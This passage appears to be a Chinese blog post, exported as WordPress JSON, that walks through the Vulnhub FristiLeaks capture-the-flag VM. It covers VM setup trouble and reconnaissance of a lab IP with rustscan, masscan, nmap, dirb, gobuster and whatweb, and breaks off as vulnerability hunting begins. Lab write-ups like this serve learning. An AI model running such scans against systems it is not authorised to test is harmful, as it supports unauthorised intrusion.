{"id":334,"date":"2024-02-01T00:14:41","date_gmt":"2024-01-31T16:14:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=334"},"modified":"2024-02-01T00:14:41","modified_gmt":"2024-01-31T16:14:41","slug":"vulnhub-fristileaks","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/334\/02\/01\/2024\/","title":{"rendered":"Vulnhub&#8211;FristiLeaks"},"content":{"rendered":"<h1>FristiLeaks<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347420.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347420.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129223941741\" \/><\/div><\/p>\n<p>\u7ec8\u4e8e\u5f00\u59cb\u6362\u9776\u573a\u4e86\uff01<\/p>\n<h2>\u73af\u5883\u914d\u7f6e<\/h2>\n<p>\u4e0b\u8f7d\u4e0b\u6765\u662f\u4e00\u4e2a<code>.ova<\/code>\u6587\u4ef6\uff0c\u4ee5\u9632bug\uff0c\u91c7\u7528<code>virtualbox<\/code>\u6253\u5f00\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347423.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347423.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131181756354\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u51fabug\u4e86\uff0c\u4e0d\u8fc7\u4e5f\u5f88\u6b63\u5e38\uff0c\u8fd9\u79cd\u6bd4\u8f83\u8001\u7684\u90fd\u6709\u70b9bug\uff0c\u770b\u6765\u662f\u9700\u8981\u66f4\u6539\u4e00\u4e0b\u7f51\u5361\u914d\u7f6e\u4e86\uff0c\u66f4\u6539\u4ee5\u540e\u53d1\u73b0\u8fd8\u662f\u6709\u62a5\u9519\uff0c\u5c1d\u8bd5\u4e00\u4e0bvmware\uff1a\u4f1a\u62a5\u4e4b\u524d\u90a3\u4e2a<code>vmui<\/code>\u7684\u9519\u8bef\uff0c\u5148\u53f3\u952e\u8fdb\u884c\u5347\u7ea7\u518d\u6253\u5f00\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347425.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131183815341\" \/><\/div><\/p>\n<p>\u7136\u540e\u6253\u5f00\u4ee5\u540e\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347426.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131183903786\" \/><\/div><\/p>\n<p>\u4ed6\u8bf4\u4e86\u4ed6\u53ef\u80fd\u9700\u8981\u4e00\u4e2a\u6865\u63a5\u6a21\u5f0f\uff0c\u6216\u8005DHCP\u670d\u52a1\u7684\u6a21\u5f0f\uff0c\u6539\u56de\u6765\u5427\uff0c\u4e2d\u95f4\u6709\u4e2a<code>ide 1:0<\/code>\u65ad\u5f00\u8fde\u63a5\u7684\u62a5\u9519\uff0c\u6ca1\u7ba1\u5b83\uff0c\u5148\u770b\u770b\u80fd\u4e0d\u80fd\u6b63\u5e38\u5de5\u4f5c\uff0c\u8fd8\u662f\u4e0d\u884c\uff0c\u5220\u9664\u7f51\u5361\u91cd\u65b0\u6dfb\u52a0\u8bd5\u8bd5\uff0c\u4e0d\u884c\u3002\u3002\u3002\u3002\u6309\u7167\u4f5c\u8005\u8bf4\u7684\u66f4\u6539\u4e00\u4e0bmac\u5730\u5740\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347427.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131190350523\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347428.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131190503613\" \/><\/div><\/p>\n<p>\u597d\u4e86\uff0c\u770b\u6765\u4ee5\u540e\u8fd8\u662f\u5f97\u591a\u770b\u4f5c\u8005\u7684\u89e3\u7b54\uff01\uff01\uff01<\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u4e0d\u662f\u6b63\u5e38\u8fde\u63a5\u7684\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347429.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347429.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131190545653\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347430.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131190628013\" \/><\/div><\/p>\n<p>\u4e00\u5207\u6b63\u5e38\uff0c\u53ef\u4ee5\u5f00\u59cb\u5b66\u4e60\u4e86\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<p>\u4f7f\u7528\u6d4f\u89c8\u5668\u63d2\u4ef6<code>wappalyzer<\/code>\u770b\u4e00\u4e0b\u670d\u52a1\u5668\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347431.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347431.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131190739131\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA\n\nGoal: get UID 0 (root) and read the special flag file.\nTimeframe: should be doable in 4 hours.\n--&gt;\n&lt;html&gt;\n&lt;body bgcolor=&quot;#FF69B4&quot;&gt;\n&lt;br \/&gt;\n&lt;center&gt;&lt;h1&gt; The &lt;a href=&quot;https:\/\/twitter.com\/search?q=%23fristileaks&quot;&gt;#fristileaks&lt;\/a&gt; motto:&lt;\/h1&gt; &lt;\/center&gt;\n&lt;center&gt; &lt;img src=&quot;images\/keep-calm.png&quot; \/&gt; &lt;\/center&gt;\n&lt;br \/&gt;\nFristileaks 2015-12-11 are:&lt;br&gt; \n@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmeets, @Ar0xA\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b<code>image<\/code>\u770b\u770b\u80fd\u4e0d\u80fd\u770b\u5230\uff0c\u4e0d\u884c\uff0c\u67e5\u770b\u4e00\u4e0b\u94ed\u611f\u76ee\u5f55\uff0c\u5982 robots.txt \u7b49\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347432.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347432.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131191011179\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e09\u4e2a\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347433.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347433.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131191048601\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347434.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347434.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131191107777\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347435.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347435.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131191132156\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u4e0d\u884c\u4e86\uff0c\u987a\u4fbf\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u6ca1\u627e\u5230\u6709\u7528\u7684\u4e1c\u897f\u3002<\/p>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">rustscan -a 192.168.244.145\n# .----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n# | {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n# | .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n# `-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\n# The Modern Day Port Scanner.\n# ________________________________________\n# : https:\/\/discord.gg\/GFrQsGy           :\n# : https:\/\/github.com\/RustScan\/RustScan :\n#  --------------------------------------\n# Nmap? More like slowmap.\ud83d\udc22\n\n# [~] The config file is expected to be at &quot;\/root\/.rustscan.toml&quot;\n# [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n# [!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \n# Open 192.168.244.145:80\n# [~] Starting Script(s)\n# [&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n# [~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-31 06:22 EST\n# Initiating ARP Ping Scan at 06:22\n# Scanning 192.168.244.145 [1 port]\n# Completed ARP Ping Scan at 06:22, 0.04s elapsed (1 total hosts)\n# Initiating Parallel DNS resolution of 1 host. at 06:22\n# Completed Parallel DNS resolution of 1 host. at 06:22, 0.21s elapsed\n# DNS resolution of 1 IPs took 0.21s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\n# Initiating SYN Stealth Scan at 06:22\n# Scanning 192.168.244.145 [1 port]\n# Discovered open port 80\/tcp on 192.168.244.145\n# Completed SYN Stealth Scan at 06:22, 0.02s elapsed (1 total ports)\n# Nmap scan report for 192.168.244.145\n# Host is up, received arp-response (0.00054s latency).\n# Scanned at 2024-01-31 06:22:21 EST for 0s\n\n# PORT   STATE SERVICE REASON\n# 80\/tcp open  http    syn-ack ttl 64\n# MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)\n\n# Read data files from: \/usr\/bin\/..\/share\/nmap\n# Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds\n#            Raw packets sent: 2 (72B) | Rcvd: 2 (72B)<\/code><\/pre>\n<p>\u4eca\u5929\u6709\u70b9\u6162\uff0c\u6ca1\u4e8b\u6b63\u597d\u5c1d\u8bd5\u4e86\u5176\u4ed6\u51e0\u4e2a\u5de5\u5177\uff1a<\/p>\n<pre><code class=\"language-shell\">masscan --rate=100000 -p 0-65535 192.168.244.145\n# Starting masscan 1.3.2 (http:\/\/bit.ly\/14GZzcT) at 2024-01-31 11:26:19 GMT\n# Initiating SYN Stealth Scan\n# Scanning 1 hosts [65536 ports\/host]\n# Discovered open port 80\/tcp on 192.168.244.145<\/code><\/pre>\n<p>\u53ea\u626b\u51fa\u6765\u4e8680\u7aef\u53e3\u3002<\/p>\n<p>nmap \u626b\u4e00\u4e0b\u76f8\u5173\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap -T4 -sV 192.168.244.145 -p 80\n# Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-31 06:28 EST\n# Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\n# Service scan Timing: About 0.00% done\n# Nmap scan report for 192.168.244.145\n# Host is up (0.00049s latency).\n\n# PORT   STATE SERVICE VERSION\n# 80\/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV\/2 PHP\/5.3.3)\n# MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)\n\n# Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done: 1 IP address (1 host up) scanned in 9.25 seconds<\/code><\/pre>\n<p>\u548c\u6211\u4eec\u6d4f\u89c8\u5668\u63d2\u4ef6\u5f97\u5230\u4e1c\u897f\u5dee\u4e0d\u591a\u3002<\/p>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">dirb http:\/\/192.168.244.145\n# ---- Scanning URL: http:\/\/192.168.244.145\/ ----\n# + http:\/\/192.168.244.145\/cgi-bin\/ (CODE:403|SIZE:210)                                       \n# ==&gt; DIRECTORY: http:\/\/192.168.244.145\/images\/                                               \n# + http:\/\/192.168.244.145\/index.html (CODE:200|SIZE:703)                                     \n# + http:\/\/192.168.244.145\/robots.txt (CODE:200|SIZE:62)                                     <\/code><\/pre>\n<p>\u6ca1\u5565\u6536\u83b7\uff0c\u987a\u4fbf\u4e5f\u7528<code>gobuster<\/code>\u626b\u4e00\u4e0b\u8bd5\u8bd5\u770b\uff0c\u548cdirb\u626b\u51fa\u6765\u7684\u7ed3\u679c\u5dee\u4e0d\u591a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347436.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347436.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131194048296\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7f51\u9875\u6307\u7eb9\u8bc6\u522b<\/h3>\n<pre><code class=\"language-shell\">whatweb http:\/\/192.168.244.145\n# http:\/\/192.168.244.145 [200 OK] Apache[2.2.15], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache\/2.2.15 (CentOS) DAV\/2 PHP\/5.3.3], IP[192.168.244.145], PHP[5.3.3], WebDAV[2]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<p>\u5c1d\u8bd5\u5728\u7f51\u7ad9\u4e0a\u641c\u5bfb\u4fe1\u606f\uff0c\u770b\u770b\u6709\u6ca1\u6709\u53ef\u4ee5\u8bbf\u95ee\u5230\u7684\u654f\u611f\u8d44\u6e90\uff1a<\/p>\n<p>\u70b9\u5f00\u8fde\u63a5\u67e5\u770b\u4e86\u4e00\u4e0b\uff0c\u627e\u5230\u4e86\u8fd9\u6837\u4e00\u4e2a\u7167\u7247\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347437.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347437.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131194625214\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u641c\u4e00\u4e0b\u8fd9\u4e2a<code>Fristi<\/code>\u770b\u770b\u662f\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347438.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347438.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131194723847\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u662f\u4e00\u4e2a\u9178\u5976\u54c1\u724c\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\u8fd9\u4e2a\u76ee\u5f55\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347439.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  